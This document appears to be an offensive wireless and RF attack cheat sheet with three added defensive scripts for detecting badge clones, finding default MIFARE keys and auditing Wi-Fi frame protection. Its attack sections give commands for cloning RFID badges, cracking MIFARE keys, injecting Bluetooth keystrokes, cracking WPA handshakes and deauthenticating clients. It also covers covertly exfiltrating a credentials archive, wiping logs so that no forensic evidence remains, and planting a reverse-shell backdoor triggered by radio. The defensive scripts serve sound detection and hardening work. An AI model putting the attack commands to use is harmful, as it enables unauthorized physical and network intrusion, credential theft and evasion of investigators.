RFID Attacks

Clone & Emulate RFID Badges

Tools: Proxmark3, Bitflipper Zero, RFIDler

# Use Proxmark3 to read a 125kHz LF tag
proxmark3 /dev/ttyUSB0 -c "lf hid read"

# Save the dump and replay it
proxmark3 /dev/ttyUSB0 -c "lf hid sim -r <dump>"

# Write to a blank RFID tag
proxmark3 /dev/ttyUSB0 -c "lf hid clone -r <dump> -w"

  • Works on HID Prox and EM4100 tags.

  • Can be modified to work with 13.56MHz smart cards.
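From the defender's side, a cloned HID Prox or EM4100 badge carries the same ID as the original, so the physical access-control logs are where the clone shows up: one badge ID presented at two readers faster than a person could walk between them. The following script is an added example, not part of the original page or of the Proxmark3 project; the log format, reader names and transit times are constructed for illustration and would be replaced with the site's own values.

```python
"""Detect possible cloned badges from access-control logs (added example).

Flags a badge ID granted at two different readers closer in time than
the minimum transit time between those readers, which is the typical
signature of a cloned or replayed LF credential.
"""
from datetime import datetime, timedelta

# Constructed sample log lines: timestamp, reader name, badge ID, result.
SAMPLE_LOG = """\
2024-03-01T08:59:10 lobby-north 0x1A2B3C granted
2024-03-01T09:00:02 lobby-north 0x99FF01 granted
2024-03-01T09:00:40 datacenter-door 0x1A2B3C granted
2024-03-01T09:14:55 lobby-south 0x1A2B3C granted
2024-03-01T09:30:00 datacenter-door 0x99FF01 denied
"""

# Assumed minimum walking time between reader pairs (site-specific values).
MIN_TRANSIT = {
    frozenset({"lobby-north", "datacenter-door"}): timedelta(minutes=5),
    frozenset({"lobby-north", "lobby-south"}): timedelta(minutes=2),
    frozenset({"lobby-south", "datacenter-door"}): timedelta(minutes=5),
}


def parse_log(text):
    """Parse the constructed log format into (timestamp, reader, badge, result)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, reader, badge, result = line.split()
        events.append((datetime.fromisoformat(ts), reader, badge, result))
    return events


def find_impossible_travel(events):
    """Return (badge, reader_a, reader_b, gap) for consecutive grants of one
    badge at two different readers closer together than MIN_TRANSIT allows."""
    by_badge = {}
    for ts, reader, badge, result in sorted(events):
        if result == "granted":  # denials do not prove presence
            by_badge.setdefault(badge, []).append((ts, reader))
    alerts = []
    for badge, seq in by_badge.items():
        for (t1, r1), (t2, r2) in zip(seq, seq[1:]):
            if r1 == r2:
                continue  # same reader twice is not a travel event
            limit = MIN_TRANSIT.get(frozenset({r1, r2}))
            if limit is not None and t2 - t1 < limit:
                alerts.append((badge, r1, r2, t2 - t1))
    return alerts


if __name__ == "__main__":
    for badge, r1, r2, gap in find_impossible_travel(parse_log(SAMPLE_LOG)):
        print(f"possible clone: {badge} at {r1} then {r2} after {gap}")
```

In the sample data, badge 0x1A2B3C is granted at lobby-north and then at datacenter-door 90 seconds later, below the assumed five-minute transit time, so it is reported; its later lobby-south grant is far enough apart to pass. The same logic generalises to any reader pair once the transit table is filled in from the floor plan.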

Sniff & Replay RFID

# Capture an RFID handshake using Bitflipper Zero
bitflipper-cli rfid-sniff --freq 13.56MHz --log rfid_log.txt

# Replay the captured handshake
bitflipper-cli rfid-replay --input rfid_log.txt

  • Works on MIFARE Classic with weak key encryption.

  • Modify replay delay to bypass simple anti-replay mechanisms.

NFC Attacks

Capture & Modify NFC Data

Tools: LibNFC, MFCUK, MFOC

# Scan for NFC tags
nfc-list

# Dump a MIFARE Classic card (if default keys work)
nfc-mfclassic r a dump.mfd

# Crack MIFARE keys using MFCUK
mfcuk -C -R 0 -s 250 -S 250 -v -O keys.txt

  • Exploits vulnerabilities in MIFARE Classic cards.

  • Once cracked, use nfc-mfclassic w to write back modified data.

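The "if default keys work" condition above is the first thing an issuer should audit on its own cards: any sector still protected by the factory transport key can be read and rewritten without MFCUK or MFOC at all. The script below is an added example, not code from the page or from the libnfc project; it inspects a MIFARE Classic 1K dump in the raw .mfd layout that nfc-mfclassic produces (64 blocks of 16 bytes, with each sector's trailer holding key A, the access bits and key B). The dump it checks is constructed inline, and it assumes that a dump written with known keys stores those keys in the trailer bytes. Re-keying only removes the trivial case; the Crypto-1 weaknesses the page refers to remain, so the longer-term fix is migrating to a card family with a modern cipher.

```python
"""Report MIFARE Classic 1K sectors still on the factory key (added example).

Layout of a 1K .mfd dump: 16 sectors x 4 blocks x 16 bytes = 1024 bytes.
The 4th block of each sector is the trailer: key A (6) | access bits (4) | key B (6).
"""

DEFAULT_KEY = bytes.fromhex("FFFFFFFFFFFF")   # NXP transport (factory) key
DEFAULT_ACCESS_BITS = bytes.fromhex("FF078069")  # transport access conditions


def build_sample_dump(rekeyed_sectors):
    """Constructed 1K dump: zeroed data blocks, factory keys everywhere except
    in rekeyed_sectors, which get a fixed illustrative key.
    (Assumption: a dump written with known keys stores those keys in the trailer.)"""
    blocks = []
    for sector in range(16):
        for blk in range(4):
            if blk == 3:
                key = bytes.fromhex("A1B2C3D4E5F6") if sector in rekeyed_sectors else DEFAULT_KEY
                blocks.append(key + DEFAULT_ACCESS_BITS + key)
            else:
                blocks.append(bytes(16))
    return b"".join(blocks)


def sector_trailers(dump):
    """Yield (sector, key_a, access_bits, key_b) for every sector of a 1K dump."""
    if len(dump) != 1024:
        raise ValueError("expected a MIFARE Classic 1K dump of 1024 bytes")
    for sector in range(16):
        trailer = dump[sector * 64 + 48: sector * 64 + 64]
        yield sector, trailer[:6], trailer[6:10], trailer[10:]


def sectors_with_default_keys(dump):
    """Return the sector numbers whose key A or key B is still the transport key."""
    return [s for s, key_a, _, key_b in sector_trailers(dump)
            if key_a == DEFAULT_KEY or key_b == DEFAULT_KEY]


def load_and_audit(path):
    """Audit a real dump file on disk, e.g. one saved by `nfc-mfclassic r a dump.mfd`."""
    with open(path, "rb") as fh:
        return sectors_with_default_keys(fh.read())


if __name__ == "__main__":
    sample = build_sample_dump(rekeyed_sectors={0, 1})
    print("sectors still on the factory key:", sectors_with_default_keys(sample))
```

Run against a dump from a card your organisation issued, an empty result means every sector was re-keyed; anything else lists the sectors that a default-key read would open.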
Bluetooth Attacks

Discover & Exploit Devices

Tools: hcitool, l2ping, Bettercap

# Scan for Bluetooth devices
hcitool scan

# Discover services on a target device
sdptool browse <MAC>

# Ping a Bluetooth device to check if it’s active
l2ping -c 1 <MAC>

# Force a pairing attempt
bluetoothctl pair <MAC>

  • Identify default PIN/authentication weaknesses.

  • Use Bettercap for advanced Bluetooth sniffing.

Inject Keystrokes Over Bluetooth

Tools: HIDAttack

# Use HIDAttack to inject keystrokes
hidattack -d <MAC> -s "echo 'hacked' > /tmp/pwned.txt"

  • Targets vulnerable Bluetooth HID devices.

Wi-Fi Attacks

Capture & Decrypt WPA Handshakes

Tools: Aircrack-ng, hcxtools

# Capture WPA handshake
airodump-ng -c <channel> --bssid <router MAC> -w capture wlan0

# Decrypt using a wordlist
aircrack-ng -w rockyou.txt -b <router MAC> capture.cap

  • Use PMKID attacks for networks with WPS enabled.

  • Convert handshake to Hashcat format with hcxpcapngtool.

Deauth Clients to Capture Handshake

# Deauthenticate clients
aireplay-ng --deauth 10 -a <router MAC> -c <client MAC> wlan0

  • Works if AP doesn’t have MFP (Management Frame Protection) enabled.
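The MFP caveat above is the whole mitigation: with 802.11w enforced, clients discard unauthenticated deauthentication and disassociation frames, so the flood never disconnects them. On a hostapd access point the setting is the `ieee80211w` key (0 = disabled, the default; 1 = optional; 2 = required), and WPA3-SAE additionally requires it. The following audit script is an added example, not code from the page or from the hostapd or Aircrack-ng projects; the two configurations it checks are constructed inline, with the weak setting beside the corrected one.

```python
"""Audit a hostapd.conf for Management Frame Protection (added example).

ieee80211w=0 (hostapd's default) leaves unprotected deauth/disassoc frames
accepted; =1 protects only clients that negotiate MFP; =2 requires it.
"""

# Constructed: the weak configuration, vulnerable to the deauth flood above.
WEAK_CONF = """\
interface=wlan0
ssid=corp-wifi
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=example-passphrase
rsn_pairwise=CCMP
ieee80211w=0
"""

# Constructed: the corrected configuration (WPA3-SAE with MFP required).
HARDENED_CONF = """\
interface=wlan0
ssid=corp-wifi
wpa=2
wpa_key_mgmt=SAE
sae_password=example-passphrase
rsn_pairwise=CCMP
ieee80211w=2
"""


def parse_hostapd(text):
    """Parse hostapd's key=value format, ignoring blank lines and comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def audit_mfp(text):
    """Return a list of findings; an empty list means the MFP posture is acceptable."""
    conf = parse_hostapd(text)
    findings = []
    w = conf.get("ieee80211w", "0")  # absent key means hostapd's default of 0
    if w == "0":
        findings.append("ieee80211w=0: MFP disabled; unprotected deauth/disassoc accepted")
    elif w == "1":
        findings.append("ieee80211w=1: MFP optional; clients that skip it remain deauthable")
    if "SAE" in conf.get("wpa_key_mgmt", "").split() and w != "2":
        findings.append("WPA3-SAE configured but ieee80211w!=2; SAE requires MFP")
    return findings


def hardened_version(text):
    """Return the configuration with ieee80211w forced to 2 (added if absent)."""
    kept = [ln for ln in text.splitlines() if not ln.strip().startswith("ieee80211w=")]
    kept.append("ieee80211w=2")
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mfp(conf) or ["ok"])
```

Setting `ieee80211w=2` can lock out old clients that never implemented 802.11w, so mixed fleets are usually moved through `ieee80211w=1` first; the audit still reports that as a finding because unprotected clients on such a network remain exposed.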

Data Exfiltration Over RF

Tools: RTL-SDR, Bitflipper Zero

# Transmit data covertly over RF
bitflipper-cli exfil --file creds.zip --freq 433MHz

  • Use frequency hopping to evade detection.

  • Combine with rtl_433 on a receiver to listen for the signal.

Cleanup & Persistence

Wipe Logs & Disable Traces

# Securely wipe device logs
bitflipper-cli wipe --secure

# Remove pairing from Bluetooth history
rm -rf /var/lib/bluetooth/*

  • Ensure no forensic evidence remains.

Maintain Persistence via RF Triggers

# Deploy a backdoor triggered via RF
bitflipper-cli backdoor --trigger 433MHz --payload reverse_shell.sh

  • Keeps access open via radio signal activation.